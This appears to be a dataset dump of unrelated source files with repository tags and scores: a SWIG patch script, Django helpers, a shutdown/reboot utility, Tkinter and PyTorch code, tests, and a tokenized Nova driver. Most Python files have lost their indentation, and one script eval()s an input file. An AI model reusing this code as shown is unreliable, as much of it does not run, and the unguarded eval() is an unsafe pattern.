result,
status_code=200)
else:
return func.HttpResponse(
urllib.parse.unquote_plus(validationToken),
status_code=200) | 2.3125 | 2 |
tools/patch_codegen.py | joeleong/idapython | 0 | 12786278 |
import os, re
try:
from argparse import ArgumentParser
except:
print "Failed to import module 'argparse'. Upgrade to Python 2.7, copy argparse.py to this directory or try 'apt-get install python-argparse'"
raise
parser = ArgumentParser(description='Patch some code generation, so it builds')
parser.add_argument("-f", "--file", required=True)
parser.add_argument("-p", "--patches", required=True)
parser.add_argument("-v", "--verbose", default=False, action="store_true")
parser.add_argument("-V", "--apply-valist-patches", default=False, action="store_true")
args = parser.parse_args()
patched_cmt = "// patched by patch_codegen.py"
if os.path.isfile(args.patches):
with open(args.patches, "r") as fin:
        patches = eval(fin.read())
else:
    patches = {}
wrap_regex = re.compile(r"SWIGINTERN PyObject \*_wrap_([a-zA-Z0-9_]*)\(.*")
director_method_regex = re.compile(r".*(SwigDirector_[a-zA-Z0-9_]*::[a-zA-Z0-9_]*)\(.*")
swig_clink_var_get_regex = re.compile(r"SWIGINTERN PyObject \*(Swig_var_[a-zA-Z0-9_]*_get).*")
swig_clink_var_set_regex = re.compile(r"SWIGINTERN int (Swig_var_[a-zA-Z0-9_]*_set).*")
lines = []
with open(args.file, "rb") as f:
STAT_UNKNOWN = {}
STAT_IN_FUNCTION = {}
stat = STAT_UNKNOWN
func_patches = []
entered_function = False
for line in f:
m = wrap_regex.match(line)
if not m:
m = director_method_regex.match(line)
if not m:
m = swig_clink_var_get_regex.match(line)
if not m:
m = swig_clink_var_set_regex.match(line)
if m:
stat = STAT_IN_FUNCTION
fname = m.group(1)
entered_function = True
func_patches = patches.get(fname, [])
else:
for patch_kind, patch_data in func_patches:
if patch_kind == "va_copy":
if args.apply_valist_patches:
dst_va, src_va = patch_data
target = "%s = *%s;" % (dst_va, src_va)
if line.strip() == target:
line = "set_vva(%s, *%s); %s\n" % (dst_va, src_va, patched_cmt)
elif patch_kind == "acquire_gil":
if entered_function:
line = " PYW_GIL_GET; %s\n%s" % (patched_cmt, line)
elif patch_kind == "repl_text":
idx = line.find(patch_data[0])
if idx > -1:
line = line.rstrip().replace(patch_data[0], patch_data[1])
line = "%s %s\n" % (line, patched_cmt)
else:
raise Exception("Unknown patch kind: %s" % patch_kind)
entered_function = False
lines.append(line)
tmp_file = "%s.tmp" % args.file
with open(tmp_file, "w") as f:
f.writelines(lines)
os.unlink(args.file)
os.rename(tmp_file, args.file)
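# A rough sketch of the --patches file format this script eval()s; the function names and values
# below are hypothetical, chosen only to show the shape of the data:
#
#   {
#       "some_wrapped_function": [
#           ("acquire_gil", None),                    # prepend "PYW_GIL_GET;" to the function body
#       ],
#       "SwigDirector_example::method": [
#           ("repl_text", ("old text", "new text")),  # literal in-line text replacement
#       ],
#       "another_function": [
#           ("va_copy", ("dst_va", "src_va")),        # rewrite "dst_va = *src_va;" as set_vva(...)
#       ],
#   }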
| 2.859375 | 3 |
utils/snippets.py | NumanIbnMazid/invoice_management | 0 | 12786279 | import random
import string
import time
from django.utils.text import slugify
from urllib.parse import urlparse
from django.db import models
from django.dispatch import receiver
import uuid
# PDF imports
from io import BytesIO
from django.http import HttpResponse
from django.template.loader import get_template
from xhtml2pdf import pisa
import pdfkit
def random_string_generator(size=4, chars=string.ascii_lowercase + string.digits):
"""[Generates random string]
Args:
size (int, optional): [size of string to generate]. Defaults to 4.
chars ([str], optional): [characters to use]. Defaults to string.ascii_lowercase+string.digits.
Returns:
[str]: [Generated random string]
"""
return ''.join(random.choice(chars) for _ in range(size))
def random_number_generator(size=4, chars='1234567890'):
"""[Generates random number]
Args:
size (int, optional): [size of number to generate]. Defaults to 4.
chars (str, optional): [numbers to use]. Defaults to '1234567890'.
Returns:
[str]: [Generated random number]
"""
return ''.join(random.choice(chars) for _ in range(size))
def simple_random_string():
"""[Generates simple random string]
Returns:
[str]: [Generated random string]
"""
timestamp_m = time.strftime("%Y")
timestamp_d = time.strftime("%m")
timestamp_y = time.strftime("%d")
timestamp_now = time.strftime("%H%M%S")
random_str = random_string_generator()
random_num = random_number_generator()
bindings = (
random_str + timestamp_d + random_num + timestamp_now +
timestamp_y + random_num + timestamp_m
)
return bindings
def simple_random_string_with_timestamp(size=None):
"""[Generates random string with timestamp]
Args:
size ([int], optional): [Size of string]. Defaults to None.
Returns:
[str]: [Generated random string]
"""
timestamp_m = time.strftime("%Y")
timestamp_d = time.strftime("%m")
timestamp_y = time.strftime("%d")
random_str = random_string_generator()
random_num = random_number_generator()
bindings = (
random_str + timestamp_d + timestamp_m + timestamp_y + random_num
)
if not size == None:
return bindings[0:size]
return bindings
def unique_slug_generator(instance, field=None, new_slug=None):
"""[Generates unique slug]
Args:
instance ([Model Class instance]): [Django Model class object instance].
field ([Django Model Field], optional): [Django Model Class Field]. Defaults to None.
new_slug ([str], optional): [passed new slug]. Defaults to None.
Returns:
[str]: [Generated unique slug]
"""
if field == None:
field = instance.title
if new_slug is not None:
slug = new_slug
else:
slug = slugify(field[:50])
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
return unique_slug_generator(instance, new_slug=new_slug)
return slug
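# A minimal usage sketch (the model below is hypothetical, not part of this module): calling
# unique_slug_generator from save() so the slug is filled on first save.
#
#   class Article(models.Model):
#       title = models.CharField(max_length=255)
#       slug = models.SlugField(unique=True, blank=True)
#       def save(self, *args, **kwargs):
#           if not self.slug:
#               self.slug = unique_slug_generator(self, field=self.title)
#           super().save(*args, **kwargs)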
def url_check(url):
"""[Checks if a provided string is URL or Not]
Args:
url ([str]): [URL String]
Returns:
[bool]: [returns True if provided string is URL, otherwise returns False]
"""
min_attr = ('scheme', 'netloc')
try:
result = urlparse(url)
if all([result.scheme, result.netloc]):
return True
else:
return False
except:
return False
def autoUniqueIdWithField(fieldname):
"""[Generates auto slug integrating model's field value and UUID]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_unique_id(sender, instance, *args, raw=False, **kwargs):
if not raw and not getattr(instance, fieldname):
source = getattr(instance, fieldname)
def generate():
uuid = random_number_generator(size=12)
Klass = instance.__class__
qs_exists = Klass.objects.filter(uuid=uuid).exists()
if qs_exists:
generate()
else:
instance.uuid = uuid
pass
# generate uuid
generate()
return model
return decorator
def autoslugWithFieldAndUUID(fieldname):
"""[Generates auto slug integrating model's field value and UUID]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
source = getattr(instance, fieldname)
try:
slug = slugify(source)[:123] + "-" + str(uuid.uuid4())
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
instance.slug = new_slug
else:
instance.slug = slug
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def autoslugFromField(fieldname):
"""[Generates auto slug from model's field value]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname!r}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
source = getattr(instance, fieldname)
try:
slug = slugify(source)
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
instance.slug = new_slug
else:
instance.slug = slug
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def autoslugFromUUID():
"""[Generates auto slug using UUID]
"""
def decorator(model):
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
try:
instance.slug = str(uuid.uuid4())
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
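# A hedged example of applying the decorators above to a Django model; the model and field names
# are placeholders.
#
#   @autoslugFromField(fieldname="title")
#   class Post(models.Model):
#       title = models.CharField(max_length=255)
#       slug = models.SlugField(unique=True, blank=True)
#
#   # autoslugFromUUID() works the same way for models whose slug should simply be a UUID:
#   @autoslugFromUUID()
#   class Invoice(models.Model):
#       slug = models.SlugField(unique=True, blank=True)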
def generate_unique_username_from_email(instance):
"""[Generates unique username from email]
Args:
instance ([model class object instance]): [model class object instance]
Raises:
ValueError: [If found invalid email]
Returns:
[str]: [unique username]
"""
# get email from instance
email = instance.email
if not email:
raise ValueError("Invalid email!")
def generate_username(email):
return email.split("@")[0][:15] + "__" + simple_random_string_with_timestamp(size=5)
generated_username = generate_username(email=email)
Klass = instance.__class__
qs_exists = Klass.objects.filter(username=generated_username).exists()
if qs_exists:
# recursive call
generate_unique_username_from_email(instance=instance)
return generated_username
def render_to_pdf(template_src, context_dict={}):
"""[summary]
Args:
template_src ([str]): [path of html file to render]
context_dict (dict, optional): [additional contexts]. Defaults to {}.
Returns:
[HttpResponse/None]: [Django HttpResponse object or None]
"""
template = get_template(template_src)
html = template.render(context_dict)
result = BytesIO()
pdf = pisa.pisaDocument(BytesIO(html.encode("ISO-8859-1")), result)
if not pdf.err:
return HttpResponse(result.getvalue(), content_type='application/pdf')
return None
def render_template(template_src, context_dict={}):
"""[summary]
Args:
template_src ([str]): [path of html file to render]
context_dict (dict, optional): [additional contexts]. Defaults to {}.
Returns:
[HttpResponse/None]: [Django HttpResponse object or None]
"""
template = get_template(template_src)
html = template.render(context_dict)
return html
def generate_pdf_with_pdfkit(template_src=None, context=None, options=None, css=[], filename="Download.pdf"):
try:
if not options:
options = {
'page-size': 'Letter',
'margin-top': '0.75in',
'margin-right': '0.75in',
'margin-bottom': '0.75in',
'margin-left': '0.75in',
'encoding': "UTF-8",
'custom-header': [
('Accept-Encoding', 'gzip')
],
'cookie': [
('cookie-empty-value', '""')
],
'no-outline': None
}
template = render_template(template_src=template_src, context_dict=context)
pdf = pdfkit.from_string(
template, options=options, css=css
)
response = HttpResponse(pdf, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="' + filename + '"'
return response
except Exception as E:
return HttpResponse(str(E), content_type='text/plain')
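# A rough usage sketch for the PDF helpers above; the template path, context and view name are
# placeholders.
#
#   def invoice_pdf_view(request):
#       context = {"invoice_no": "INV-0001"}
#       response = render_to_pdf("invoices/invoice.html", context_dict=context)
#       return response or HttpResponse("PDF generation failed", status=500)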
| 2.46875 | 2 |
program/tools.py | techtuxbr/WatchDogs | 6 | 12786280 | import os
from . import computer
def shutdown():
if computer.os() == "Windows":
os.system("shutdown -s")
elif computer.os() == "Linux":
os.system("shutdown -h")
else:
print("Sistema operacional nao detectado, impossivel executar a operacao desejada")
def reboot():
if computer.os() == "Windows":
os.system("shutdown -r")
elif computer.os() == "Linux":
os.system("shutdown -r")
else:
print("Sistema operacional nao detectado, impossivel executar a operacao desejada") | 3.34375 | 3 |
TeLoRa_v0_03/test_code/Gauge.py | OHAProject/LoRa-tracker | 0 | 12786281 | # -*- coding: utf-8 -*-
import Tkinter
import time
from random import randrange
class Mod_gauge(Tkinter.Canvas):
def __init__(self, parent, titre = "Gauge",background="#222735",foreground="#00d0c7", max = 127, min = 0):
global valeur, root, arc, text, H, W, coord1, coord2
        self.titre = titre
        self.max = max
        self.min = min
root = parent
valeur = 0.
H=290
W=260
coord1 = (H-240), (W-215), (H-80), (W-50)
coord2 = (H-270), (W-240), (H-50), (W-20)
Tkinter.Canvas.__init__(self, bg="#FF2E2E", height=H, width=W)
        # Draw the gauge
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
#self.create_oval(coord1, outline="#3399FF")
arc = self.create_arc(coord2, start=90, extent = valeur, fill="#FF8B8B",outline="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(valeur), font="Arial 40 italic", fill="#FF8B8B")
legende = self.create_text(130, 260, text= self.titre, font="Arial 20 ", fill="#FF8B8B")
parent.update()
def SetValue(self, consigne):
global valeur, root, arc, text
parent = root
        consigne = (consigne*100)/self.max
while (int(valeur) != int(consigne*3.6)):
if (int(valeur) < int(consigne*3.6)):
valeur = valeur + 1
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
                #time.sleep(0.00002)  # Sets the gauge's inertia
elif( int(valeur) > int(consigne*3.6)):
valeur = valeur - 1
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
                #time.sleep(0.00002)  # Sets the gauge's inertia
else :
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
                #time.sleep(0.00002)  # Sets the gauge's inertia
def val():
for i in range(1,10):
gauge.SetValue(randrange(100))
if __name__=="__main__":
app=Tkinter.Tk()
gauge=Mod_gauge(app)
gauge.pack()
val()
app.mainloop()
| 2.796875 | 3 |
exer205.py | profnssorg/valmorMantelli1 | 0 | 12786282 | ###Title: Rewrite function
###Function: This program was rewritten to add a variable
###Author: <NAME>.
###Date: 24/11/20148
###Version: 0.0.1
# Data input
a = 5
b = 3
c = 4
# Data output
print(a + b + c)
| 2.890625 | 3 |
extra/time_profiling.py | blacknred/pybook | 0 | 12786283 | import time
from decimal import Decimal, getcontext
from functools import wraps
'''
Ways to count execution time:
- time of whole program: $time python3.8 slow_program.py
- too many info: $python3.8 -m cProfile -s time slow_program.py
- direct time measure with Timing Specific Function(via decorator):
'''
def timeit_wrapper(func):
    @wraps(func)
def wrapper(*args, **kwargs):
start = time.perf_counter() # Alternatively, you can use time.process_time()
func_return_val = func(*args, **kwargs)
end = time.perf_counter()
print('{0:<10}.{1:<8} : {2:<8}'.format(
func.__module__, func.__name__, end - start))
return func_return_val
return wrapper
# slow_program.py ------------------------------------------------------------------
@timeit_wrapper
def exp(x):
getcontext().prec += 2
i, lasts, s, fact, num = 0, 0, 1, 1, 1
while s != lasts:
lasts = s
i += 1
fact *= i
num *= x
s += num / fact
getcontext().prec -= 2
return +s
print('{0:<10} {1:<8} {2:^8}'.format('module', 'function', 'time'))
exp(Decimal(150))
exp(Decimal(400))
exp(Decimal(3000))
| 3.6875 | 4 |
books/tests/inventory.py | samweru/bookkeep | 0 | 12786284 | from books.models import *
from freezegun import freeze_time
from django.test import TransactionTestCase
from django.test import TestCase
from django.db import DatabaseError, transaction
from books.controllers.customer import Order as SaleOrder
from books.controllers import accountant as acc
from books.controllers import sale
from books.seeders import sales_order as so
import moment
import json
import unittest
import random
import datetime
import logging
logger = logging.getLogger(__name__)
class InventoryTestCase(TestCase):
def setUp(self):
self.trxNo = acc.getTrxNo("INV")
def test_so(self):
total_price = 0
total_cost = 0
try:
with transaction.atomic():
salesOrder = SaleOrder()
for x in range(2):
units = random.randint(1,10)
cat = so.getCatalogue(created_at=datetime.datetime.now())
stock = so.getStock(cat=cat, trxNo=self.trxNo, created_at=datetime.datetime.now())
salesOrder.addItem(cat=cat, units=units)
total_cost += units * stock.unit_cost
total_price += units * stock.cat.price
self.assertEqual(total_price, salesOrder.getTotalPrice())
self.assertTrue(salesOrder.saveWithTrxNo(self.trxNo))
self.assertEqual(total_cost, salesOrder.getTotalCost())
trx = sale.invoice(order=salesOrder, descr="Stationery")
self.assertTrue(sale.receipt(trxNo=self.trxNo, amt=salesOrder.getTotalPrice()))
except DatabaseError as e:
logger.error(e)
except Exception as e:
logger.error(e)
def tearDown(self):
pass | 2.4375 | 2 |
whatrecord/tests/test_autosave.py | ZLLentz/whatrecord | 2 | 12786285 | <reponame>ZLLentz/whatrecord
import pathlib
import pprint
import apischema
import pytest
from ..autosave import AutosaveRestoreFile, RestoreError, RestoreValue
from ..common import LoadContext
from . import conftest
autosave_FILES = list((conftest.MODULE_PATH / "iocs").glob("**/*.sav"))
additional_files = conftest.MODULE_PATH / "autosave_filenames.txt"
if additional_files.exists():
    for additional in additional_files.read_text().splitlines():
autosave_FILES.append(pathlib.Path(additional))
autosave_files = pytest.mark.parametrize(
"autosave_file",
[
pytest.param(
autosave_file,
id="/".join(autosave_file.parts[-2:])
)
for autosave_file in autosave_FILES
]
)
@autosave_files
def test_parse(autosave_file):
proto = AutosaveRestoreFile.from_file(autosave_file)
serialized = apischema.serialize(proto)
pprint.pprint(serialized)
apischema.deserialize(AutosaveRestoreFile, serialized)
def test_basic():
result = AutosaveRestoreFile.from_string(
"""\
# save/restore V5.1 Automatically generated - DO NOT MODIFY - 130618-005710
! 5 channel(s) not connected - or not all gets were successful
XPP:R30:EVR:27:CTRL.DG0C 119
<END>
""", filename="None")
assert result.comments == [
"save/restore V5.1 Automatically generated - DO NOT MODIFY - 130618-005710",
]
assert result.values == {
"XPP:R30:EVR:27:CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 3), ),
record="XPP:R30:EVR:27:CTRL",
field="DG0C",
pvname="XPP:R30:EVR:27:CTRL.DG0C",
value="119",
)
}
}
assert result.errors == [
RestoreError(
context=(LoadContext("None", 2), ),
number=5,
description="channel(s) not connected - or not all gets were successful",
)
]
def test_basic_array():
result = AutosaveRestoreFile.from_string(
'''\
# save/restore V5.1 Automatically generated - DO NOT MODIFY - 130618-005710
! 5 channel(s) not connected - or not all gets were successful
XPP:R30:EVR:27:CTRL.DG0C @array@ { "500" "0.6" "0" "0" "0" "0" "0" "0" "0"'''
+ ''' "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" }
<END>
''', filename="None"
)
assert result.comments == [
"save/restore V5.1 Automatically generated - DO NOT MODIFY - 130618-005710",
]
assert result.values == {
"XPP:R30:EVR:27:CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 3), ),
record="XPP:R30:EVR:27:CTRL",
field="DG0C",
pvname="XPP:R30:EVR:27:CTRL.DG0C",
value=[
"500", "0.6", "0", "0", "0", "0", "0", "0", "0", "0", "0",
"0", "0", "0", "0", "0", "0", "0", "0", "0", "0", "0", "0",
"0", "0"
]
)
}
}
assert result.errors == [
RestoreError(
context=(LoadContext("None", 2), ),
number=5,
description="channel(s) not connected - or not all gets were successful",
)
]
def test_basic_empty_value():
result = AutosaveRestoreFile.from_string(
"""XPP:R30:EVR:27:CTRL.DG0C \n<END>""", filename="None"
)
assert result.values == {
"XPP:R30:EVR:27:CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 1), ),
record="XPP:R30:EVR:27:CTRL",
field="DG0C",
pvname="XPP:R30:EVR:27:CTRL.DG0C",
value="",
)
}
}
def test_basic_string():
result = AutosaveRestoreFile.from_string(
r"""
XPP:R30:EVR:27:CTRL.DG0C "a quoted string"
<END>
""", filename="None"
)
assert result.values == {
"XPP:R30:EVR:27:CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 2),),
record="XPP:R30:EVR:27:CTRL",
field="DG0C",
pvname="XPP:R30:EVR:27:CTRL.DG0C",
value="a quoted string",
)
}
}
def test_basic_escaped():
result = AutosaveRestoreFile.from_string(
r"""
CTRL.DG0C a \"quoted\" string
CTRL.DG1C @array@ { "1.23" " 2.34" " 3.45" }
CTRL.DG2C @array@ { "abc" "de\"f" "g{hi\"" "jkl mno} pqr" }
<END>
""", filename="None")
assert result.values == {
"CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 2), ),
record="CTRL",
field="DG0C",
pvname="CTRL.DG0C",
value='a "quoted" string',
),
"DG1C": RestoreValue(
context=(LoadContext("None", 3), ),
record="CTRL",
field="DG1C",
pvname="CTRL.DG1C",
value=["1.23", " 2.34", " 3.45"],
),
"DG2C": RestoreValue(
context=(LoadContext("None", 4), ),
record="CTRL",
field="DG2C",
pvname="CTRL.DG2C",
value=["abc", 'de"f', 'g{hi"', "jkl mno} pqr"],
),
}
}
def test_basic_disconnected():
result = AutosaveRestoreFile.from_string(
r"""
XPP:R30:EVR:27:CTRL.DG0C a \"quoted\" string
#abc Search Issued
#def Search Issued
XPP:R30:EVR:27:CTRL.DG1C an unquoted string
#ghi Search Issued
<END>
""")
assert result.disconnected == [
"abc",
"def",
"ghi",
]
| 1.984375 | 2 |
rbg/generalization.py | bottlenome/rbg | 0 | 12786286 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .function import onehot, onehot_cross
class random_batch_generalization_abs(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
mag = mag.abs()
ctx.save_for_backward(x, ref_index, target_index, mag)
ret = x.clone()
ret_y = y.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
total = (mag[i].abs() + (1 - mag[i]).abs())
target_p = mag[i].abs() / total
ref_p = (1 - mag[i]).abs() / total
ret_y[target_index[i]] += y[ref_index[i]] * target_p
ret_y[ref_index[i]] = y[ref_index[i]] * ref_p
return ret, ret_y
@staticmethod
def backward(ctx, grad_output, _):
x, ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class random_batch_generalization(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
ctx.save_for_backward(x, ref_index, target_index, mag)
ret = x.clone()
ret_y = y.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
total = (mag[i].abs() + (1 - mag[i]).abs())
target_p = mag[i].abs() / total
ref_p = (1 - mag[i]).abs() / total
ret_y[target_index[i]] += y[ref_index[i]] * target_p
ret_y[ref_index[i]] = y[ref_index[i]] * ref_p
return ret, ret_y
@staticmethod
def backward(ctx, grad_output, _):
x, ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class RandomBatchGeneralization(nn.Module):
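    """Randomly mixes pairs of samples (and their one-hot labels) within a batch during training; passes data through unchanged at eval time."""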
def __init__(self, rate=0.1, epsilon=0.4, abs_mag=False):
super().__init__()
self.epsilon = epsilon
self.rate = rate
        if abs_mag:
            self.forward_ = random_batch_generalization_abs.apply
        else:
            self.forward_ = random_batch_generalization.apply
def forward(self, x, y):
if self.training:
return self.forward_(x, y, self.rate, self.epsilon)
else:
return x, y
class batch_generalization(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.zeros(ref_index.shape, dtype=torch.int)
for i in range(len(ref_index)):
same_label = torch.where(y == y[ref_index[i]])[0]
j = torch.randint(low=0, high=len(same_label), size=(1,))
target_index[i] = same_label[j[0]]
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
ret = x.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
# ctx.save_for_backward(x, ref_index, target_index, mag)
ctx.save_for_backward(ref_index, target_index, mag)
return ret
@staticmethod
def backward(ctx, grad_output):
# x, ref_index, target_index, mag = ctx.saved_tensors
ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class BatchGeneralization(nn.Module):
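    """Mixes each selected sample with another sample of the same class; labels are unchanged and data passes through untouched at eval time."""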
def __init__(self, rate=0.1, epsilon=0.4):
super().__init__()
self.epsilon = epsilon
self.rate = rate
self.forward_ = batch_generalization.apply
def forward(self, x, y):
if self.training:
return self.forward_(x, y, self.rate, self.epsilon)
else:
return x
class GeneralizationDoNothing(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4):
super().__init__()
def forward(self, x, y):
return x
if __name__ == '__main__':
import time
def profile(func, x, y):
start = time.perf_counter()
ret = func(x, y)
end = time.perf_counter()
print("{}, {} ms".format(str(func), (end - start) * 1000))
return ret
x = torch.rand((100, 3, 256, 256), requires_grad=True)
y = torch.randint(low=0, high=9, size=(100,))
r = RandomBatchGeneralization(rate=0.5)
ret_x, ret_y = profile(r, x, onehot(y, 10))
ret_x.sum().backward()
print(ret_y[:10])
print(ret_y.shape)
# profile(r.cuda(), x.cuda())
r = BatchGeneralization()
ret = profile(r, x, y)
ret.sum().backward()
output = torch.rand((100, 10), requires_grad=True)
loss = onehot_cross(output, onehot(y, 10))
print(loss)
loss.backward()
loss = torch.nn.functional.cross_entropy(output, y)
print(loss)
loss = onehot_cross(output, ret_y)
print(loss)
| 2.09375 | 2 |
nova/virt/libvirt/volume/smbfs.py | bopopescu/nova-token | 0 | 12786287 | begin_unit
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'re'
newline|'\n'
nl|'\n'
name|'import'
name|'nova'
op|'.'
name|'conf'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'libvirt'
name|'import'
name|'utils'
name|'as'
name|'libvirt_utils'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'libvirt'
op|'.'
name|'volume'
name|'import'
name|'fs'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'libvirt'
op|'.'
name|'volume'
name|'import'
name|'remotefs'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'nova'
op|'.'
name|'conf'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
DECL|variable|USERNAME_REGEX
name|'USERNAME_REGEX'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'r"(user(?:name)?)=(?:[^ ,]+\\\\)?([^ ,]+)"'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|LibvirtSMBFSVolumeDriver
name|'class'
name|'LibvirtSMBFSVolumeDriver'
op|'('
name|'fs'
op|'.'
name|'LibvirtBaseFileSystemVolumeDriver'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Class implements libvirt part of volume driver for SMBFS."""'
newline|'\n'
nl|'\n'
DECL|member|_get_mount_point_base
name|'def'
name|'_get_mount_point_base'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'CONF'
op|'.'
name|'libvirt'
op|'.'
name|'smbfs_mount_point_base'
newline|'\n'
nl|'\n'
DECL|member|get_config
dedent|''
name|'def'
name|'get_config'
op|'('
name|'self'
op|','
name|'connection_info'
op|','
name|'disk_info'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Returns xml for libvirt."""'
newline|'\n'
name|'conf'
op|'='
name|'super'
op|'('
name|'LibvirtSMBFSVolumeDriver'
op|','
